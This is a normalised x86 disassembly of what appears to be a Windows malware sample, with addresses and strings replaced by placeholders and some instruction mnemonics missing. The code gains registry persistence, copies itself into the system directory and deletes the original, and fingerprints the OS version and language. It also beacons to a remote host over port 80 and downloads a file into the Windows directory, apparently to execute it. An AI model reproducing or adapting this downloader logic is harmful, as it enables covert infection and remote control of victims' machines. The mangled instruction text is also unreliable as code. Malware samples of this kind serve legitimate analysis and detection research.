sub_401000
push ebp
mov ebp esp
push 0xffffffff
push sub_405e20
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
push ecx
push ebx
push esi
push edi
mov [ ebp - 0x4 ] 0x0
mov [ ebp - 0x10 ] esp
call sub_401070
test eax eax
jne r-xdata
call sub_4023d0
call [ WSACleanup@IAT ]
mov ecx [ ebp - 0xc ]
pop edi
pop esi
xor eax eax
mov [ fs : 0x0 ] ecx
pop ebx
mov esp ebp
pop ebp
retn 0x10
mov eax 0x1
mov ecx [ ebp - 0xc ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn 0x10
sub_401070
push ecx
push esi
push edi
or ecx 0xffffffff
mov edi rw-data
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
shr ecx 0x2
mov edi rw-data
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
or ecx 0xffffffff
mov edi rw-data
[ edi ]
not ecx
sub edi ecx
mov edx ecx
mov esi edi
shr ecx 0x2
mov edi rw-data
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
or ecx 0xffffffff
mov edi rw-data
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
shr ecx 0x2
mov edi rw-data
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov edx ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi rw-data
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
shr ecx 0x2
mov edi rw-data
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
or ecx 0xffffffff
mov edi rw-data
[ edi ]
not ecx
sub edi ecx
mov edx ecx
mov esi edi
or ecx 0xffffffff
mov edi rw-data
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
or ecx 0xffffffff
mov edi rw-data
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
shr ecx 0x2
mov edi rw-data
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi rw-data
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi rw-data
or ecx 0xffffffff
[ edi ]
dec edi
mov ecx edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
push rw-data
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
push eax
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
push eax
mov esi edi
mov edx ecx
mov edi rw-data
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
push eax
and ecx 0x3
[ edi ] [ esi ]
mov esi [ __import_lookup_table_0(KERNEL32:CreateEventA) ]
call esi
push rw-data
push 0x0
push 0x0
push 0x0
mov [ rw-data ] eax
call esi
push rw-data
push 0x0
push 0x0
push 0x0
mov [ rw-data ] eax
call esi
mov [ rw-data ] eax
call sub_401350
test eax eax
jne r-xdata
push rw-data
call sub_401780
call sub_4017c0
neg eax
sbb eax eax
push 0x0
neg eax
mov [ rw-data ] eax
call sub_401370
call sub_401580
call sub_402940
call sub_405820
call sub_402040
call sub_402290
mov esi [ __import_lookup_table_3(MSVCRT:malloc) ]
push 0x2000
call esi
add esp 0xc
mov [ rw-data ] eax
test eax eax
jne r-xdata
pop edi
pop esi
pop ecx
retn
push 0x2000
call esi
add esp 0x4
mov [ rw-data ] eax
test eax eax
jne r-xdata
pop edi
pop esi
pop ecx
retn
lea eax [ esp + 0x8 ]
push eax
push 0x0
push 0x0
push sub_402ea0
push 0x0
push 0x0
call [ __import_lookup_table_0(KERNEL32:CreateThread) ]
pop edi
mov eax 0x1
pop esi
pop ecx
retn
pop edi
pop esi
pop ecx
retn
sub_401370
sub esp 0x288
push ebp
push esi
xor esi esi
lea eax [ esp + 0x8 ]
push esi
push eax
push esi
push 0x2001f
push esi
push rw-data
push esi
push rw-data
push 0x80000002
mov [ esp + 0x30 ] 0x80
call [ __import_lookup_table_1(ADVAPI32:RegCreateKeyExA) ]
mov eax [ esp + 0x8 ]
mov ebp [ __import_lookup_table_1(ADVAPI32:RegQueryValueExA) ]
lea ecx [ esp + 0xc ]
lea edx [ esp + 0x10 ]
push ecx
push edx
push esi
push esi
push rw-data
push eax
call ebp
test eax eax
jne r-xdata
push edi
lea ecx [ esp + 0x94 ]
push 0x200
push ecx
push 0x0
call [ GetModuleFileNameA@IAT ]
lea edx [ esp + 0x94 ]
push 0x5c
push edx
call [ __import_lookup_table_3(MSVCRT:strrchr) ]
mov edx eax
add esp 0x8
inc edx
or ecx 0xffffffff
mov edi edx
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
mov cl [ edx ]
xor edi edi
test cl cl
je r-xdata
mov al [ esp + 0x10 ]
test al al
je r-xdata
mov ecx [ esp + 0x10 ]
mov eax [ esp + 0xc ]
lea edx [ esp + 0x14 ]
push ecx
push edx
push 0x1
push 0x0
push rw-data
push eax
mov [ esp + edi + 0x2c ] 0x0
call [ RegSetValueExA@IAT ]
pop edi
lea esi [ esp + 0x14 ]
mov eax edx
sub esi edx
mov eax [ esp + 0x294 ]
mov [ esi + rw-data ] 0x0
test eax eax
je r-xdata
dec al
mov [ esi + rw-data ] al
mov al [ esp + esi + 0x11 ]
inc esi
test al al
jne r-xdata
mov eax [ esp ]
test eax eax
je r-xdata
push 0x0
call [ time@IAT ]
push eax
call [ srand@IAT ]
add esp 0x8
call [ rand@IAT ]
push 0x4
push rw-data
mov [ rw-data ] eax
mov eax [ esp + 0x8 ]
push 0x4
push 0x0
push rw-data
push eax
call [ RegSetValueExA@IAT ]
inc cl
inc edi
mov [ esi + eax ] cl
mov cl [ eax + 0x1 ]
inc eax
test cl cl
jne r-xdata
mov edx [ esp + 0x8 ]
lea ecx [ esp + 0xc ]
push ecx
push rw-data
push 0x0
push 0x0
push rw-data
push edx
call ebp
pop esi
pop ebp
test eax eax
je r-xdata
add esp 0x288
retn
push eax
call [ RegCloseKey@IAT ]
sub_401500
push ecx
lea eax [ esp ]
push 0x0
push eax
push 0x0
push 0x2001f
push 0x0
push rw-data
push 0x0
push rw-data
push 0x80000002
call [ __import_lookup_table_1(ADVAPI32:RegCreateKeyExA) ]
cmp [ esp + 0xc ] 0x1
jne r-xdata
mov edx [ esp + 0x8 ]
mov eax [ esp ]
push edx
push eax
call [ __import_lookup_table_1(ADVAPI32:RegDeleteValueA) ]
mov edx [ esp + 0x8 ]
push edi
mov edi edx
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
push ecx
mov ecx [ esp + 0x8 ]
push edx
push 0x1
push eax
push edx
push ecx
call [ RegSetValueExA@IAT ]
pop edi
jmp r-xdata
pop ecx
retn
push eax
call [ RegCloseKey@IAT ]
mov eax [ esp ]
test eax eax
je r-xdata
sub_401580
sub esp 0x600
push ebx
push ebp
push esi
push edi
push rw-data
push 0x0
push 0x1f0001
call [ __import_lookup_table_0(KERNEL32:OpenMutexA) ]
mov ebp [ __import_lookup_table_0(KERNEL32:lstrcmpiA) ]
mov ebx [ __import_lookup_table_0(KERNEL32:GetSystemDirectoryA) ]
test eax eax
je r-xdata
push rw-data
push 0x0
push 0x0
call [ __import_lookup_table_0(KERNEL32:CreateMutexA) ]
lea ecx [ esp + 0x210 ]
push 0x400
push ecx
push 0x0
call [ GetModuleFileNameA@IAT ]
lea edx [ esp + 0x10 ]
push 0x200
push edx
mov [ esp + eax + 0x218 ] 0x0
call ebx
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x10 ]
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea edx [ esp + 0x10 ]
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea eax [ esp + 0x10 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
lea ecx [ esp + 0x214 ]
push ecx
call ebp
pop edi
pop esi
pop ebp
pop ebx
test eax eax
je r-xdata
push eax
call [ CloseHandle@IAT ]
push rw-data
push rw-data
call ebp
test eax eax
jne r-xdata
push 0x1
push rw-data
call sub_401500
push 0x1
call sub_401370
add esp 0x60c
retn
lea edx [ esp ]
push 0x0
lea eax [ esp + 0x204 ]
push edx
push eax
call [ CopyFileA@IAT ]
lea ecx [ esp ]
push ecx
call sub_4048a0
lea edx [ esp + 0x4 ]
push edx
call sub_404e40
add esp 0x8
push 0x1
call [ ExitProcess@IAT ]
mov eax [ rw-data ]
push eax
call [ __import_lookup_table_0(KERNEL32:SetEvent) ]
mov ecx [ rw-data ]
push 0x1388
push ecx
call [ __import_lookup_table_0(KERNEL32:WaitForSingleObject) ]
push 0x1f4
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
lea edx [ esp + 0x10 ]
push 0x200
push edx
call ebx
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x10 ]
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea edx [ esp + 0x10 ]
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea eax [ esp + 0x10 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call [ __import_lookup_table_0(KERNEL32:DeleteFileA) ]
push 0x0
push rw-data
call sub_401500
add esp 0x8
push rw-data
push rw-data
call ebp
test eax eax
je r-xdata
push 0x1
call [ ExitProcess@IAT ]
sub_401780
push esi
mov esi [ esp + 0x8 ]
push edi
mov ecx 0x27
xor eax eax
mov edi esi
[ edi ]
mov edi [ __import_lookup_table_0(KERNEL32:GetVersionExA) ]
push esi
mov [ esi ] 0x9c
call edi
test eax eax
jne r-xdata
call [ __import_lookup_table_0(KERNEL32:GetSystemDefaultLangID) ]
pop edi
mov [ rw-data ] ax
pop esi
retn
push esi
mov [ esi ] 0x94
call edi
sub_4017c0
sub esp 0x108
push esi
lea eax [ esp + 0x4 ]
push edi
push eax
push 0x1
push 0x0
push rw-data
push 0x80000001
mov [ esp + 0x20 ] 0x4
call [ RegOpenKeyExA@IAT ]
test eax eax
jne r-xdata
pop edi
xor eax eax
pop esi
add esp 0x108
retn
mov edx [ esp + 0x8 ]
mov esi [ __import_lookup_table_1(ADVAPI32:RegQueryValueExA) ]
lea ecx [ esp + 0xc ]
push ecx
push rw-data
push eax
push eax
push rw-data
push edx
call esi
mov edx [ esp + 0x8 ]
mov edi eax
lea eax [ esp + 0xc ]
lea ecx [ esp + 0x10 ]
push eax
push ecx
push 0x0
push 0x0
push rw-data
push edx
mov [ esp + 0x24 ] 0x100
call esi
mov esi eax
mov eax [ esp + 0x8 ]
push eax
call [ RegCloseKey@IAT ]
test edi edi
jne r-xdata
test esi esi
jne r-xdata
mov eax [ rw-data ]
test eax eax
je r-xdata
lea ecx [ esp + 0x10 ]
push rw-data
push ecx
call [ __import_lookup_table_3(MSVCRT:strstr) ]
mov edi eax
add esp 0x8
test edi edi
je r-xdata
lea edi [ esp + 0x10 ]
add edi 0x5
jmp r-xdata
push 0x3a
push edi
call [ __import_lookup_table_3(MSVCRT:strchr) ]
mov edx eax
or ecx 0xffffffff
xor eax eax
mov [ edx ] 0x0
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
inc edx
[ edi ] [ esi ]
push edx
call [ atoi@IAT ]
add esp 0xc
mov [ rw-data ] eax
mov eax 0x1
pop edi
pop esi
add esp 0x108
retn
sub_4018d0
mov eax 0x2120
call sub_405c40
push ebx
push ebp
push esi
push edi
mov edi [ esp + 0x2134 ]
push edi
call sub_402a00
add esp 0x4
push eax
call [ inet_addr@IAT ]
mov ebp [ esp + 0x2138 ]
push 0x0
push 0x1
push 0x2
mov esi eax
call [ socket@IAT ]
mov ebx eax
cmp ebx 0xffffffff
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x2120
retn
lea eax [ esp + 0x18 ]
mov [ esp + 0x18 ] 0x1
push eax
push 0x8004667e
push ebx
call [ ioctlsocket@IAT ]
mov eax [ rw-data ]
mov [ esp + 0x10 ] 0x3c
test eax eax
mov [ esp + 0x14 ] 0x0
mov [ esp + 0x30 ] ebx
mov [ esp + 0x2c ] 0x1
je r-xdata
push ebp
mov [ esp + 0x20 ] 0x2
call [ htons@IAT ]
lea ecx [ esp + 0x1c ]
push 0x10
push ecx
push ebx
mov [ esp + 0x2a ] ax
mov [ esp + 0x2c ] esi
call [ connect@IAT ]
lea edx [ esp + 0x10 ]
lea ecx [ esp + 0x2c ]
push edx
push 0x0
lea eax [ ebx + 0x1 ]
push ecx
push 0x0
push eax
call [ select@IAT ]
test eax eax
jle r-xdata
push rw-data
call [ inet_addr@IAT ]
mov ebp [ rw-data ]
mov esi eax
push ebx
mov ebp [ esp + 0x2144 ]
mov edx [ esp + 0x2150 ]
mov eax [ esp + 0x213c ]
mov ecx [ esp + 0x2138 ]
push ebp
push edx
push eax
push ecx
lea edx [ esp + 0x140 ]
push edi
push edx
call sub_402570
lea edi [ esp + 0x148 ]
or ecx 0xffffffff
xor eax eax
add esp 0x18
[ edi ]
not ecx
mov esi [ esp + 0x2140 ]
dec ecx
mov eax ecx
mov ecx ebp
mov edx ecx
push 0x0
lea edi [ esp + eax + 0x134 ]
add eax ebp
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
push eax
lea eax [ esp + 0x138 ]
and ecx 0x3
push eax
push ebx
[ edi ] [ esi ]
call [ send@IAT ]
cmp [ esp + 0x2150 ] 0x1
jne r-xdata
push ebx
call sub_402830
add esp 0x4
cmp eax 0xffffffff
je r-xdata
lea ecx [ esp + 0x10 ]
lea edx [ esp + 0x2c ]
push ecx
push 0x0
push edx
lea eax [ ebx + 0x1 ]
push 0x0
push eax
call [ select@IAT ]
test eax eax
push ebx
jle r-xdata
cmp eax 0x3e800
jge r-xdata
call [ closesocket@IAT ]
call [ closesocket@IAT ]
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
add esp 0x2120
retn
mov edi [ esp + 0x2148 ]
mov ebp [ recv@IAT ]
xor esi esi
mov edx 0x3e800
push 0x0
sub edx esi
lea eax [ esi + edi ]
push edx
push eax
push ebx
call ebp
cmp eax 0xffffffff
je r-xdata
test eax eax
je r-xdata
push ebx
call [ closesocket@IAT ]
mov ecx [ esp + 0x214c ]
pop edi
mov eax 0x1
mov [ ecx ] esi
pop esi
pop ebp
pop ebx
add esp 0x2120
retn
add esi eax
cmp esi 0x3e800
jl r-xdata
lea eax [ esp + 0x10 ]
lea ecx [ esp + 0x2c ]
push eax
push 0x0
push 0x0
lea eax [ ebx + 0x1 ]
push ecx
push eax
call [ select@IAT ]
test eax eax
jle r-xdata
sub_401b00
mov eax 0x3e804
call sub_405c40
lea eax [ esp ]
push 0x0
lea ecx [ esp + 0x8 ]
push eax
push ecx
push 0x0
push rw-data
push rw-data
push 0x50
push rw-data
call sub_4018d0
add esp 0x20
test eax eax
jne r-xdata
mov edx [ esp + 0x4 ]
mov eax 0x1
mov [ rw-data ] edx
add esp 0x3e804
retn
add esp 0x3e804
retn
sub_401b60
mov eax 0x3ed04
call sub_405c40
push ebx
push ebp
push esi
push edi
or ecx 0xffffffff
mov edi rw-data
xor eax eax
lea edx [ esp + 0x114 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
shr ecx 0x2
mov edi edx
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
or ecx 0xffffffff
mov edi rw-data
[ edi ]
not ecx
dec ecx
mov edi rw-data
mov edx ecx
or ecx 0xffffffff
inc edx
[ edi ]
not ecx
sub edi ecx
lea ebx [ esp + edx + 0x114 ]
mov eax ecx
mov esi edi
mov edi ebx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
mov esi rw-data
lea edx [ edx + ecx + 0x1 ]
mov ecx 0x27
lea edi [ esp + edx + 0x114 ]
add edx 0x9c
[ edi ] [ esi ]
mov cx [ rw-data ]
mov edi [ rw-data ]
mov [ esp + edx + 0x114 ] cx
mov ecx [ rw-data ]
add edx 0x2
test edi edi
setne al
mov [ esp + edx + 0x114 ] al
inc edx
mov edi rw-data
xor eax eax
mov [ esp + edx + 0x114 ] ecx
or ecx 0xffffffff
add edx 0x4
[ edi ]
not ecx
sub edi ecx
lea ebx [ esp + edx + 0x114 ]
mov eax ecx
mov esi edi
mov edi ebx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
lea ebx [ edx + ecx + 0x1 ]
call [ GetTickCount@IAT ]
xor edx edx
mov esi 0x36ee80
mov ecx eax
div esi
mov eax 0x45e7b273
mul edx
shr edx 0xe
mov eax 0x95217cb1
push edx
mul ecx
shr edx 0x15
push edx
lea ecx [ esp + 0x1c ]
push rw-data
push ecx
call [ __import_lookup_table_3(MSVCRT:sprintf) ]
lea edi [ esp + 0x24 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + ebx + 0x124 ]
[ edi ]
not ecx
sub edi ecx
push 0x2f
mov eax ecx
mov esi edi
mov edi edx
lea edx [ esp + 0x28 ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x28 ]
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
mov edi rw-data
lea ebx [ ebx + ecx + 0x1 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ esp + 0x28 ]
push ecx
call [ __import_lookup_table_3(MSVCRT:strrchr) ]
mov edx eax
mov edi rw-data
or ecx 0xffffffff
xor eax eax
add esp 0x18
lea ebp [ esp + ebx + 0x114 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi ebp
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
test edx edx
je r-xdata
lea eax [ esp + 0x10 ]
push 0x1
lea ecx [ esp + 0x518 ]
push eax
mov eax [ rw-data ]
push ecx
lea edx [ esp + 0x120 ]
push ebx
push edx
push rw-data
push 0xca68
push eax
call [ inet_ntoa@IAT ]
push eax
call sub_4018d0
add esp 0x20
pop edi
pop esi
pop ebp
pop ebx
add esp 0x3ed04
retn
lea edi [ esp + 0x14 ]
or ecx 0xffffffff
xor eax eax
mov [ edx ] 0x0
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi ebp
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
lea edi [ esp + 0x14 ]
mov edx ecx
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
add ecx ebx
lea ebx [ ecx + edx + 0x2 ]
sub_401dd0
mov eax 0x3e804
call sub_405c40
lea eax [ esp ]
push 0x0
lea ecx [ esp + 0x8 ]
push eax
push ecx
push 0x0
push rw-data
push rw-data
push 0x50
push rw-data
call sub_4018d0
add esp 0x20
test eax eax
jne r-xdata
mov edx [ esp ]
lea eax [ esp + 0x4 ]
push edx
push eax
call sub_401e30
add esp 0x8
neg eax
sbb eax eax
neg eax
add esp 0x3e804
retn
add esp 0x3e804
retn
sub_401e30
push ebx
push ebp
push esi
push edi
mov edi [ esp + 0x18 ]
xor ebp ebp
test edi edi
jle r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
retn
mov edx [ esp + 0x14 ]
sbb eax eax
sbb eax 0xffffffff
test cl cl
je r-xdata
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
pop edi
add ecx ebp
pop esi
pop ebp
pop ebx
mov ecx [ ecx + edx + 0x1 ]
mov edx [ rw-data ]
cmp ecx edx
sete al
retn
inc ebp
cmp ebp edi
jl r-xdata
xor eax eax
jmp r-xdata
mov bl [ eax + 0x1 ]
mov cl bl
cmp bl [ esi + 0x1 ]
jne r-xdata
mov esi rw-data
lea eax [ edx + ebp ]
test eax eax
je r-xdata
add eax 0x2
add esi 0x2
test cl cl
jne r-xdata
mov bl [ eax ]
mov cl bl
cmp bl [ esi ]
jne r-xdata
sub_401eb0
push ebx
mov ebx [ esp + 0xc ]
push ebp
push esi
push edi
lea edi [ ebx + ebx * 4 + 0x3a98 ]
xor esi esi
shl edi 0x1
call [ GetTickCount@IAT ]
test ebx ebx
mov [ rw-data ] eax
jle r-xdata
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
retn
mov ebp [ esp + 0x14 ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
retn
mov edx [ rw-data ]
mov eax ebx
sub eax esi
push 0x0
lea ecx [ esi + ebp ]
push eax
push ecx
push edx
call [ send@IAT ]
cmp eax 0xffffffff
jne r-xdata
add esi eax
mov eax ebx
sub eax esi
add eax 0xbb8
lea edi [ eax + eax * 4 ]
shl edi 0x1
call [ WSAGetLastError@IAT ]
cmp eax 0x2733
jne r-xdata
mov eax [ rw-data ]
test eax eax
jne r-xdata
mov [ rw-data ] 0x0
push 0x1
call [ __import_lookup_table_0(KERNEL32:Sleep) ]
mov eax edi
dec edi
test eax eax
je r-xdata
jmp r-xdata
cmp esi ebx
jl r-xdata
sub_401f50
sub esp 0x200
push ebx
mov ebx [ esp + 0x208 ]
cmp [ ebx ] 0x41
je r-xdata
push edi
mov ecx 0x80
xor eax eax
lea edi [ esp + 0x8 ]
mov edx [ rw-data ]
[ edi ]
mov ecx [ ebx + 0x1 ]
push ecx
push 0x1
push rw-data
push 0xfa10
push edx
call [ inet_ntoa@IAT ]
push eax
lea eax [ esp + 0x1c ]
push eax
call sub_402570
lea edi [ esp + 0x20 ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
push ecx
lea ecx [ esp + 0x24 ]
push ecx
call sub_401eb0
add esp 0x20
test eax eax
pop edi
jne r-xdata
mov eax [ rw-data ]
test eax eax
je r-xdata
mov edx [ esp + 0x20c ]
push edx
push ebx
call sub_401eb0
add esp 0x8
pop ebx
add esp 0x200
retn
pop ebx
add esp 0x200
retn
mov eax [ rw-data ]
mov [ rw-data ] 0x1
push eax
mov [ rw-data ] 0x0
call [ closesocket@IAT ]
mov eax [ rw-data ]
test eax eax
jne r-xdata
call sub_402a30
test eax eax
jne r-xdata
push esi
mov esi [ __import_lookup_table_0(KERNEL32:Sleep) ]
pop ebx
add esp 0x200
retn
push 0x1
call esi
mov eax [ rw-data ]
test eax eax
je r-xdata
pop esi
sub_402040
push ecx
push ebx
push 0x3e800
call [ __import_lookup_table_3(MSVCRT:malloc) ]
mov ebx eax
add esp 0x4
test ebx ebx
je r-xdata
pop ebx
pop ecx
retn
lea eax [ esp + 0x4 ]
push 0x0
push eax
push ebx
push 0x0
push rw-data
push rw-data
push 0x50
push rw-data
call sub_4018d0
add esp 0x20
test eax eax
je r-xdata
push ebx
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
push esi
push edi
mov edi rw-data
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov edx ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
pop edi
pop esi
sub_4020c0
sub esp 0x408
push ebx
push ebp
push esi
push edi
push 0x3e800
call [ __import_lookup_table_3(MSVCRT:malloc) ]
mov ebp eax
add esp 0x4
test ebp ebp
jne r-xdata
lea eax [ esp + 0x10 ]
push 0x0
push eax
push ebp
push 0x0
push rw-data
push rw-data
push 0x50
push rw-data
call sub_4018d0
add esp 0x20
test eax eax
jne r-xdata
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
mov ecx [ esp + 0x10 ]
mov esi rw-data
mov eax ebp
mov [ ecx + ebp ] 0x0
push ebp
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
sbb eax eax
sbb eax 0xffffffff
test cl cl
je r-xdata
lea eax [ esp + 0x10 ]
push 0x0
push eax
push ebp
push 0x0
push rw-data
push rw-data
push 0x50
push rw-data
call sub_4018d0
add esp 0x20
test eax eax
jne r-xdata
push ebp
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
xor eax eax
jmp r-xdata
mov dl [ eax + 0x1 ]
mov bl [ esi + 0x1 ]
mov cl dl
cmp dl bl
jne r-xdata
lea ecx [ esp + 0x18 ]
push 0x400
push ecx
call [ __import_lookup_table_0(KERNEL32:GetWindowsDirectoryA) ]
mov edi [ rw-data ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x18 ]
[ edi ]
not ecx
sub edi ecx
push eax
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
push 0x2
push 0x2
mov ecx ebx
push eax
push eax
and ecx 0x3
lea eax [ esp + 0x2c ]
push 0x40000000
[ edi ] [ esi ]
push eax
call [ __import_lookup_table_0(KERNEL32:CreateFileA) ]
mov esi eax
cmp esi 0xffffffff
jne r-xdata
push ebp
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
test eax eax
jne r-xdata
add eax 0x2
add esi 0x2
test cl cl
jne r-xdata
mov edx [ esp + 0x10 ]
lea ecx [ esp + 0x14 ]
push 0x0
push ecx
push edx
push ebp
push esi
call [ WriteFile@IAT ]
push esi
mov edi eax
call [ CloseHandle@IAT ]
test edi edi
jne r-xdata
push ebp
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
mov dl [ eax ]
mov bl [ esi ]
mov cl dl
cmp dl bl
jne r-xdata
lea eax [ esp + 0x18 ]
push eax
call sub_404e40
push ebp
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x8
mov eax 0x1
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
push ebp
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
xor eax eax
pop edi
pop esi
pop ebp
pop ebx
add esp 0x408
retn
sub_402290
sub esp 0x408
push ebx
push esi
push edi
push 0x3e800
call [ __import_lookup_table_3(MSVCRT:malloc) ]
mov ebx eax
add esp 0x4
test ebx ebx
jne r-xdata
lea eax [ esp + 0xc ]
push 0x0
push eax
push ebx
push 0x0
push rw-data
push rw-data
push 0x50
push rw-data
call sub_4018d0
add esp 0x20
test eax eax
jne r-xdata
pop edi
pop esi
pop ebx
add esp 0x408
retn
push ebp
lea ecx [ esp + 0x18 ]
push 0x400
push ecx
call [ __import_lookup_table_0(KERNEL32:GetWindowsDirectoryA) ]
